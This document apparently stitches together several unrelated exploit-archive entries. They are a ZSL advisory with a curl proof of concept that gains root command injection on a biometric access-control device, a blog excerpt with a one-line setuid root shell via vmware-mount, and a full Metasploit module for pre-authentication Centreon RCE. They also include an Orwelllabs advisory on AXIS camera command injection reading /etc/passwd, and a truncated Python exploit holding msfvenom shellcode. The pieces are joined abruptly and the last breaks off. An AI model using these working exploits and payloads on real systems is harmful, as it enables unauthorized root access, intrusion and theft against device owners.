command execution vulnerability. The vulnerability exist due to several POST parameters
in the '/html/SetSmarcardSettings.php' script not being sanitized when using the exec()
PHP function while updating the Smart Card Settings on the affected device. Calling the
'$CommandForExe' variable which is set to call the '/cgi-bin/setsmartcard' CGI binary
with the affected parameters as arguments allows the attacker to execute arbitrary system
commands as the root user and bypass the biometric access control in place.
=====================================================================================
/html/SetSmarCardSettings.php:
------------------------------
53: <?php
54: $ChNo = $_POST['HidChannelID'];
55: if(0 == $ChNo )
56: echo "1";
57: else
58: echo $ChNo;
59: ?>
61: <?php
62: echo "<input type = \"hidden\" name=\"HidChannelID\" value=\"$ChNo\">";
63: echo "<input type=\"hidden\" name=\"ssid\" value=\"1234\">"
64: ?>
81: <td class="menuMain">Smart Card Settings</td>
88: <!-- Content: BOF -->
97: <?php
99: $FileAvaToUpload = $_POST['HidIsFileSelect'];
100: //echo "<br>File availabe is: ";
101: //echo $FileAvaToUpload;
102: //echo "<br>";
104: $BookVal = $_POST['cmbBook'];
105: //echo "<br>BookVal is ";
106: //echo $BookVal;
108: //echo "<br>Channel value is ";
109: //echo $ChNo;
111: $OffSet = $_POST['txtOffSet'];
112: //echo "<br>Offset is ";
113: //echo $OffSet;
115: $DataFormat = $_POST['DataFormat'];
117: //echo "<br>DataFormat is ";
118: //echo $DataFormat;
120: $EncryptAlg = $_POST['EncryAlg'];
122: if(0 == $DataFormat )
123: $EncryptAlg = 4;
125: //echo "<br>Encryption Algarithm is ";
126: //echo $EncryptAlg;
128: $UseAsProxyCard = $_POST['chkUseAsProxCard'];
129: if( "" == $UseAsProxyCard )
130: $UseAsProxyCard = "0";
132: //echo "<br>Use as ProxyCard is ";
133: //echo $UseAsProxyCard;
135: $target_dir = "/tmp/temp_SmartCardKey";
137: //$target_dir = $target_dir . basename( $_FILES["file1"]["name"]);
139: if(1 == $FileAvaToUpload ) {
140: if (move_uploaded_file($_FILES["file1"]["tmp_name"], $target_dir)) {
141: //echo "The file ". basename( $_FILES["file1"]["name"]). " has been uploaded.";
142: } else {
143: //echo "Sorry, there was an error uploading your file.";
144: }
145: }
147: $out = null;
148: $rc= 0;
149: $CommandForExe = "../cgi-bin/setsmartcard $ChNo $BookVal $OffSet $DataFormat $EncryptAlg $UseAsProxyCard $FileAvaToUpload";
150: //$CommandForExe = "../cgi-bin/setsmartcard 1 0 10 1 1 0";
151: echo exec($CommandForExe, $out, $rc);
153: //print_r( $out);
154: //echo 'rc = '.$rc."\n";
156: //echo "After calling binary";
158: //echo "Return value is: ";
159: //echo $rc;
160: //echo $out;
162: $sICUVersion = $_POST['HidVerForPHP'];
163: ?>
=====================================================================================
Vulnerable parameters: DataFormat
EncryAlg
HidChannelID
HidIsFileSelect
cmbBook
txtOffSet
Tested on: GNU/Linux 3.0.51 (armv7l)
mylighttpd v1.0
PHP/5.5.13
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5346
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5346.php
06.05.2016
--
Request (cmbBook=0|id #):
-------------------------
[lqwrm@lalaland /]# curl -i -s -k -X 'POST' \
-H 'User-Agent: joxypoxy/7.2.6' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'HidChannelID=2&HidcmbBook=0&cmbBook=0|id+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08\x0d\x0a' \
'http://[TARGET]/html/SetSmarcardSettings.php'
Response:
---------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.13
Content-type: text/html
Connection: close
Date: Thu, 09 May 2016 14:40:39 GMT
Server: mylighttpd v1.0
Content-Length: 11660
...
</tr>
uid=0(root) gid=0(root) <tr>
<td colspan="2">
...
// Source: http://blog.cmpxchg8b.com/2013/08/security-debianisms.html
On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid.
488
489 if (running_setuid && privileged_mode == 0)
490 disable_priv_mode ();
491
Where disable_priv_mode is defined as:
1202 void
1203 disable_priv_mode ()
1204 {
1205 setuid (current_user.uid);
1206 setgid (current_user.gid);
1207 current_user.euid = current_user.uid;
1208 current_user.egid = current_user.gid;
1209 }
Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5:
307 /* Turning off -p? */
308 if (f == FPRIVILEGED && oldval && !newval) {
309 #ifdef OS2
310 ;
311 #else /* OS2 */
312 setuid(ksheuid = getuid());
313 setgid(getgid());
314 #endif /* OS2 */
315 } else if (f == FPOSIX && newval) {
This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file.
However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash:
http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff
A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed:
$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root
It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?).
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586
VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this:
# chmod u-s /usr/bin/vmware-mount
Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases.
In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-)
P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested.
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Centreon Web Useralias Command Execution',
'Description' => %q(
Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
errors. This functionality can be abused for arbitrary code
execution, and can be triggered via the login screen prior to
authentication.
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Nicolas CHATELAIN <n.chatelain@sysdream.com>' # discovery
],
'References' =>
[
[ 'EDB', '39501' ]
],
'License' => MSF_LICENSE,
'Platform' => ['python'],
'Privileged' => false,
'Arch' => ARCH_PYTHON,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 26 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
], self.class
)
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)
/LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
begin
vprint_status('Sending malicious login')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'vars_post' =>
{
'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
'password' => Rex::Text.rand_text_alpha(5)
}
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
_ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( 0 | R | W | 3 | L | L | L | 4 | 8 | 5 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
www.orwelllabs.com
security advisory
olsa-2015-8257
PGP: 79A6CCC0
* Advisory Information
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
(+) Title: AXIS Multiple Products Authenticated Remote Command Execution via devtools vector
(+) Vendor: AXIS Communications
(+) Research and Advisory: Orwelllabs
(+) Advisory URL: http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html
(+) Class: Improper Input Validation [CWE-20]
(+) CVE Name: CVE-2015-8257
(+) Remotely Exploitable: Yes
(+) Locally Exploitable: No
(+) OLSA-ID: OWLL2015-8257
(+) Affected Versions: Multiple Products/Firmwares (check the list bellow)
(+) IoT Attack Surface: Device Administrative Interface/Authentication/Authorization
(+) Owasp IoTTop10: I1, I2
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability
+++++++++++++
AXIS Network Cameras (various models/firmwares) are prone to Authenticated remote
command execution vulnerability. Exploiting this vulnerability a remote attacker can
force the execution of certain unauthorized actions, which may lead to further attacks.
Technical Details
+++++++++++++++++
The devtools.sh script is the responsible for vulnerability and it's 4 attack vectors through the following pages:
http://xxx.xxx.xxx.xxx/app_license.shtml?app=
http://xxx.xxx.xxx.xxx/app_license_custom.shtml?app=
http://xxx.xxx.xxx.xxx/app_index.shtml?app=
http://xxx.xxx.xxx.xxx/app_params.shtml?app=
An attacker can use the app parameter that waits for the name of a
legitimate application to inject commands in the operating system using
"%3B", for example, to read the contents of /etc/passwd:
http: //
xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd
The data entered in parameter "app =" is passed without any treatment for
devtools.sh script located at: {HTMLROOL}/bin/devtools.sh
This script contains several functions, namely:
list()
status()
menulist()
mainpagelink()
SETTINGSLINK()
confvariable()
echo_ssivar_licensekey()
load_auto_inst_form()
When these functions are invoked, they interact with the parameters passed
by the web application through
the affected scripts (e.g. ap_license.shtml? App =). By injecting the code
below:
http: //
xxx.xxx.xxx.xxx/app_license.shtml?app=ORWELLLABS%3Bcat%20/etc/passwd
The value passed in "app" will be passed directly to the script invoking
devtools.sh via shell -c as shown in the listing process below (third line
invoking confvariable function):
[SNIP]
2039 led 25472 S /usr/bin/enldgts -n
12014 root 0 SW [kworker/0:0]
13178 root 2548 S /bin/sh -c /usr/html/bin/devtools.sh
confvariable ORW..
13183 root 2728 R ps -aux PACKAGENAME
13312 root 0 SW [kworker/3:1]
13320 root 0 SW [kworker/2:0]
[SNIP]
The value "ORWELLLABS%3Bcat%20/etc/passwd" is then passed on to the
corresponding function (after passing through a conference on "confvariable
()").
confvariable() {
local val=
if [ -r "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" ]; then
. "$PACKAGE_DIRECTORY/$1/$ADPPACKCFG" || :
eval val=\$$2
echo $val
fi
}
Then enter the function "menulist ()" which we see the main stretch located
between the lines 127 and 143:
[SNIP]
127 [ "$ name", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ activeMenu1 = $ APPNAME" -> true <! - # Else - -> false <! - #
endif ->, null,
128 [
129 [ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = param_ $ APPNAME" -> true <! - # Else - -> false
<! - # endif ->, null, []],
130 EOF
131 if [-z "$ LICENSEPAGE"] || [ "$ LICENSEPAGE" axis =]; Then
132 cat << - EOF
133 [ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = license_ $ APPNAME" -> true <! - # Else - -> false
<! - # endif ->, null, []],
134 EOF
135 fi
136 if [ "$ LICENSEPAGE" = custom] && [-r "$ HTMLROOT / local / $ APPNAME /
license.inc"]; Then
137 cat << - EOF
138 [ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, <!
- # If expr = "\ $ ActivePage custom_ = $ APP NAME" -> true <! - # Else ->
false <! - # endif ->, null, []],
139 EOF
140 fi
141 if [-r "$ HTMLROOT / local / $ APPNAME / about.inc"]; Then
142 cat << - EOF
143 [ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = $ APPNAME" -> true <! - # Else - > false <! - #
endif ->, null, []],
Where the important lines are the menus below:
/bin/devtools.sh (127):
[ "$ Name", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If expr
= "\ $ activeMenu1 = $ APPNAME" -> true -> false <! - #endif ->, null,
/bin/devtools.sh (129):
[ "Settings", "/app_params.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = param_ -> true <! - # Else -> false < ! - # endif
->, null, []],
/bin/devtools.sh (133):
[ "License", "/app_license.shtml", "app = $ APPNAME &" hostA, <! - # If
expr = "\ $ ActivePage = License" -> true <! - # Else -> false <! - # endif
->, null, []],
/bin/devtools.sh (138):
[ "License", "/app_license_custom.shtml", "app = $ APPNAME &" hostA, <! - #
If expr = "\ $ ActivePage = APPNAME" -> true <! - # Else -> false <! - #
endif ->, null, []],
/bin/devtools.sh (143):
[ "About", "/app_index.shtml", "app = $ APPNAME &" hostA, <! - # If expr =
"\ $ ActivePage = $ APPNAME" - # else -> false <! - # endif ->, null, []],
In PoC presented above, the payload will be triggered in line vector 133 of
devtools script ( "License" menu) that will:
[ "License", "/app_license.shtml", "app = ORWELLLABS% 3Bcat% 20
/etc/passwd& "HostA, <! - # If expr =" \ $ ActivePage = License "-> true <!
- # Else -> false <! - # Endif ->, null, []],
And when executed echoes the results on the page.
Impact
++++++
The impact of this vulnerability is that taking into account the busybox
that runs behind (and with root privileges everywhere. in all the binaries
and scripts) is possible to execute arbitrary commands, create backdoors,
performing a reverse connection to the machine attacker, use this devices
as botnets and DDoS amplification methods... the limit is the creativity of
the attacker.
Affected Products
+++++++++++++++++
Multiple Axis Communications Products/Firmware including:
* AXIS Q6032-E/Q6034-E/Q6035-E PTZ Dome Network Camera -
Firmware 5.41.1.4
* AXIS Q6042-E/Q6044-E/Q6045-E PTZ Dome Network Camera -
Firmware 5.70.1.2
* AXIS A8004-VE Network Video Door Station -
Firmware 5.85.1.1
* AXIS P3384 fixed dome Network camera -
Firmware 6.10.1
* AXIS P5532-E PTZ Dome Network Camera -
Firmware 5.41.3.1
* AXIS Q60-E Network Dome PTZ -
Firmware 5.65.1.1, 5.41.*, 5.70.1.1
* AXIS Q7401 Video Encoder -
Firmware 5.50.4
* AXIS Q7404 Video Encoder -
Firmware 5.50.4.*
* AXIS Q7406 Blade Video Encoder -
Firmware 5.51.2
* AXIS Q7411 Video Encoder -
Firmware 5.90.1
* AXIS Q7414 Blade Video Encoder -
Firmware 5.51.2
* AXIS Q7424-R Video Encoder -
Firmware 5.50.4
* AXIS Q7424-R Mk II Video Encoder -
Firmware 5.51.3
* AXIS Q7436 Blade Video Encoder -
Firmware 5.90.1
The list bellow shows the firmwares affected (and probably these firmwares
are not available anymore, but just the last version of them, if you not
sure, check the hash). All these firmwares (in the second column) has the
same "devtools.sh" shellscript (responsible for trigger the RCE
vulnerability) embedded. The script can be found on directory:
"{HTMLROOT}/bin/devtools.sh".
========================================================================
PRODUCT FIRMWARE FIRMWARE HASH
========================================================================
AXIS A8004-VE 5.85.1.1 e666578d7fca54a7db0917839187cd1a
AXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d
AXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10
AXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921
AXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7
AXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12
AXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12
AXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e
AXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841
AXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841
AXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a
AXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e
AXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928
AXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b
AXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b
AXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7
AXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866
AXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65
AXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811
AXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e
AXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70
AXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7
AXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b
AXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6
AXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d
AXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca
AXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509
AXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61
AXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61
AXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205
AXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205
AXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d
AXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7
AXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d
AXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979
AXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866
AXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60
AXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60
AXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939
AXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969
AXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb
AXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03
AXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad
AXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f
AXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d
AXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6
AXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af
AXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba
AXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c
AXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea
AXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474
AXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4
AXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4
AXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6
AXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6
AXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56
AXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a
AXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532
AXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532
AXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476
AXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864
AXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b
AXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e
AXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e
AXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2
AXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00
AXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d
AXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be
AXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be
AXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892
AXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee
AXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee
AXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc
AXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749
AXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271
AXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8
AXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727
AXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106
AXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0
AXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698
AXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611
AXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf
AXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52
AXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e
AXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313
AXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188
AXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1
AXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1
AXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81
AXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863
AXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d
AXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44
AXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9
AXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409
AXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1
AXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83
AXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0
AXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd
AXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4
AXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49
AXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9
AXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1
AXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e
AXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688
AXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d
AXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660
AXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3
AXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de
AXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104
AXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506
AXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b
AXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47
AXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb
AXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026
AXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d
AXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53
AXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253
AXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766
AXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da
AXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501
AXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd
AXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1
AXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d
AXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928
AXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d
AXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce
AXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6
AXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea
AXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8
AXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d
AXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741
AXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746
AXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b
AXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148
AXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5
AXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f
AXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5
AXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d
AXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0
AXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e
AXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd
AXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4
AXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7
AXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee
AXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd
AXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd
AXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51
AXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77
AXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699
AXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the Vendor, tickets was opened to correct this issue.
Credits
+++++++
These vulnerabilities has been discovered and published by Orwelllabs.
Timeline
++++++++
2015-09-10: First attempt to contact Vendor
2015-10-30: Vulnerability was reported to CERT
2015-11-30: CVE-IDs are assigned
2016-07-25: Since the first vulnerability was published (09.04.2016 -
EDB-ID: 39683)
a long conversation revolved around these vulnerabilities with the
manufacturer.
We maintained communication since 15/04/2016 until now.
As there is still disagreement regarding vulnerabilities (and botnets in
the wild: https://goo.gl/k79I8u),
we thought it good to publish this advisory, since it has already exhausted
all deadlines.
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
++++++++++++++++
# Loadind k4fK43sQu3 m0dule...
#!/usr/bin/python
import os,sys
#Tested Windows 7 Home x86 & Windows 10 Home x86_x64
#badchars \x00\x0a\x1a\x20\x40
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a\x20\x40" -f python
buf = ""
buf += "\xbf\x3b\x99\xdd\xa3\xdb\xc4\xd9\x74\x24\xf4\x58\x29"
buf += "\xc9\xb1\x33\x31\x78\x12\x03\x78\x12\x83\xfb\x9d\x3f"
buf += "\x56\x07\x75\x36\x99\xf7\x86\x29\x13\x12\xb7\x7b\x47"
buf += "\x57\xea\x4b\x03\x35\x07\x27\x41\xad\x9c\x45\x4e\xc2"
